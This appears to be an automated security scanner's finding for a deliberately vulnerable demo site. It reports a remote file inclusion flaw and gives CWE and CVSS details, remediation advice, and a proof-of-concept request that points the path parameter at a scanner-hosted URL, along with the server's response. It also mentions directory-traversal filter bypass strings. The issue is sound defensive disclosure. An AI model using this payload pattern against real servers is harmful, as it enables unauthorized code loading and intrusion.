
Remote File Inclusion #8

Description

@bright-security

Remote File Inclusion

Severity: High Discovered: 10 August 2022, 02:20 PM

CWE ID

CWE-98

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L (base score 8.6, High)

Details

A file inclusion vulnerability most commonly affects web applications that rely on a scripting runtime. It arises when an application builds the path to a file it will load or execute from an attacker-controlled value, so that the attacker chooses which file is included at run time. Remote file inclusion (RFI) is the variant in which that value can name a URL rather than a local path, so the server fetches attacker-hosted content. A file inclusion vulnerability is distinct from a generic directory traversal attack: directory traversal is a way of gaining unauthorized file system access, whereas a file inclusion vulnerability subverts how an application loads code for execution. When the included content is interpreted by the runtime, successful exploitation results in remote code execution on the web server that runs the affected web application. In the request and response below, the server fetched the scanner-hosted file named in the path parameter and returned its 32-byte contents verbatim, which proves that the parameter is used to fetch an arbitrary attacker-supplied URL; whether that content is also executed depends on how the application consumes the fetched file.

Possible exposure

Execute Unauthorized Code or Commands

Remediation suggestions

When validating filenames, use a stringent whitelist that limits the character set. If feasible, allow only a single '.' character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as '/' to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434. Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a blacklist, which may be incomplete (CWE-184). For example, filtering '/' is insufficient protection if the filesystem also supports the use of '\' as a directory separator. Another possible error occurs when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if '../' sequences are removed from the '.../...//' string in a single pass, two instances of '../' are removed from the original string, but the remaining characters still form the '../' string. For this finding specifically, the path parameter should never be accepted as a URL at all: reject any value that carries a scheme such as 'http://' and resolve the validated name against a fixed directory on the server.

Request

GET https://brokencrystals.com/api/file?path=http%3A%2F%2Ffiledealer.nexploit.app%2Frfi.md5.txt&type=image%2Fjpg HTTP/1.1
Referer: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Cookie: connect.sid=WLsxvkvPswEGBPGcdFR_x06CDl0wpOnF.KIzhCcIs4f%2F82N%2FlJX%2FvT%2ByuttAcjHVYFU%2FrYiICLQk; bc-calls-counter=1660141219921
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept-Encoding: identity

Response

HTTP/1.1 200
Server: nginx/1.19.8
Date: Wed, 10 Aug 2022 14:20:20 GMT
Content-Type: image/jpg
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1660141220259
Content-Length: 32
Cache-Control: public, max-age=99999

245cc0a508bf7f0ff754c84c0fe0b5bc
